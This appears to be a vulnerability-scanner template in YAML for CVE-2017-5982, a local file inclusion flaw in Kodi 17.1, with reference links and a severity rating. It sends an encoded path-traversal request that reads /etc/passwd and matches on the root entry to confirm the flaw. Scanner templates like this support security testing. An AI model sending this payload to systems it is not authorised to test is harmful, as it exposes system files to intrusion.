39 lines
906 B
YAML
39 lines
906 B
YAML
id: CVE-2017-5982
|
|
|
|
info:
|
|
name: Kodi 17.1 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: |
|
|
Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.
|
|
reference:
|
|
- https://cxsecurity.com/issue/WLB-2017020164
|
|
- https://www.exploit-db.com/exploits/41312/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-5982
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2017-5982
|
|
cwe-id: CWE-98
|
|
tags: cve2017,kodi,lfi,edb,cve
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/06/19
|